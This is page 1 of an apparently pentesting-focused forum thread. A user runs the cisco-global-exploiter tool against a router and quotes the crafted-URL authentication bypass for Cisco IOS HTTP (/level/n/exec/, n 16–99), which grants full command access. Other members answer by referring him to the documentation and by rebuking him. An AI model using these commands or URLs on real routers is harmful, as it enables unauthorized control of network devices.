Page 1 of 2 12 LastLast
Results 1 to 10 of 15

Thread: Cisco IOS HTTP Auth Vulnerability

  1. #1
    Senior Member skull2006's Avatar
    Join Date
    Jan 2010
    Location
    In my skull
    Posts
    125

    Question Cisco IOS HTTP Auth Vulnerability

    Hi,

    I have Cisco Router i try play with it and i found this :

    root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl

    Usage :
    perl cge.pl <target> <vulnerability number>

    Vulnerabilities list :
    [1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
    [2] - Cisco IOS Router Denial of Service Vulnerability
    [3] - Cisco IOS HTTP Auth Vulnerability
    [4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
    [5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
    [6] - Cisco 675 Web Administration Denial of Service Vulnerability
    [7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
    [8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
    [9] - Cisco 514 UDP Flood Denial of Service Vulnerability
    [10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
    [11] - Cisco Catalyst Memory Leak Vulnerability
    [12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
    [13] - 0 Encoding IDS Bypass Vulnerability (UTF)
    [14] - Cisco IOS HTTP Denial of Service Vulnerability
    root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl *0.2*.*4.1 3

    Vulnerability successful exploited with [http://*0.2*.*4.1/level/17/exec/....] ...

    root@skull:/pentest/cisco/cisco-global-exploiter# firefox http://*0.2*.*4.1/level/17/exec/....

    It give me Blank Page, so how i can go forward with this exploit?
    what i can do to control the router?

    best regards,

  2. #2
    Just burned his ISO ravbyte's Avatar
    Join Date
    Jul 2010
    Location
    Guatemala
    Posts
    20

    Default Re: Cisco IOS HTTP Auth Vulnerability

    my answer it's a little out of thread, but i suggest to you, visit the nmap pen test list, there's a interest DoS thread, regards.

  3. #3
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default Re: Cisco IOS HTTP Auth Vulnerability

    Maybe you should check the documentation and read up what the specific exploit does or what it doesn't, which targets are vulnerable and so on.
    Tiocfaidh ár lá

  4. #4
    Senior Member skull2006's Avatar
    Join Date
    Jan 2010
    Location
    In my skull
    Posts
    125

    Default Re: Cisco IOS HTTP Auth Vulnerability

    Quote Originally Posted by KMDave View Post
    Maybe you should check the documentation and read up what the specific exploit does or what it doesn't, which targets are vulnerable and so on.
    This is what Documentation says:

    By sending a crafted URL it is possible to bypass authentication and execute any
    command on the router at level 15 (enable level, the most privileged level).
    This will happen only if the user is using a local database for authentication
    (usernames and passwords are defined on the device itself).
    The same URL will not be effective against every Cisco IOS software release and
    hardware combination. However, there are only 84 different combinations to try,
    so it would be easy for an attacker to test them all in a short period of time.
    The URL in question follows this format :

    http://<device_addres>/level/n/exec/....

    where n is a number between 16 and 99.

    An attacker can exercise complete control over the device.
    By exploiting this vulnerability, the attacker can see and change the
    configuration of the device.

    that is make me ask that Q.
    Last edited by skull2006; 07-19-2010 at 08:08 AM.

  5. #5
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default Re: Cisco IOS HTTP Auth Vulnerability

    Well did you check every 84 combinations?
    Tiocfaidh ár lá

  6. #6
    Senior Member skull2006's Avatar
    Join Date
    Jan 2010
    Location
    In my skull
    Posts
    125

    Exclamation Re: Cisco IOS HTTP Auth Vulnerability

    Quote Originally Posted by KMDave View Post
    Well did you check every 84 combinations?
    I don't know what is that ........ if you give me good start to make my first step.

    thank you for your feedback man.

  7. #7
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: Cisco IOS HTTP Auth Vulnerability

    ??
    It's all explained in your post...

    Quote Originally Posted by skull2006 View Post
    http://<device_addres>/level/n/exec/....

    where n is a number between 16 and 99. >> 84 possible combinations
    Last edited by Snayler; 07-19-2010 at 01:38 PM.

  8. #8
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: Cisco IOS HTTP Auth Vulnerability

    what i can do to control the router?
    Perhaps you should look at how it normally works... Then derive an answer for yourself after those observations?

    It give me Blank Page
    Are you running no-script or ad-block?

    Or perhaps you shouldn't be futzing with things you don't understand.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  9. #9
    Senior Member skull2006's Avatar
    Join Date
    Jan 2010
    Location
    In my skull
    Posts
    125

    Default Re: Cisco IOS HTTP Auth Vulnerability

    Quote Originally Posted by thorin View Post
    Or perhaps you shouldn't be futzing with things you don't understand.
    If you have TFM send it to me or keep your word inside you.

  10. #10
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: Cisco IOS HTTP Auth Vulnerability

    Quote Originally Posted by skull2006 View Post
    If you have TFM send it to me or keep your word inside you.
    Thorin's right. You obviously don't understand what you're trying to do. And keep the bad attitude for you, we don't need it.

Page 1 of 2 12 LastLast

Similar Threads

  1. Help with where to start looking in to a vulnerability
    By watcher_60 in forum OLD Newbie Area
    Replies: 2
    Last Post: 11-20-2009, 02:31 PM
  2. WPA (tkip) vulnerability
    By B@Rz- in forum Angolo Wireless
    Replies: 9
    Last Post: 11-07-2009, 12:57 PM
  3. testing cisco vulnerability and GNS3
    By imported_IPRoute in forum OLD General IT Discussion
    Replies: 3
    Last Post: 09-14-2009, 09:14 AM
  4. Cracking http auth
    By chronicburst in forum OLD BT3beta General
    Replies: 2
    Last Post: 08-11-2008, 11:29 AM
  5. Cisco IOS vulnerability exploit?
    By -~operator~- in forum OLD Pentesting
    Replies: 1
    Last Post: 06-26-2007, 06:27 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •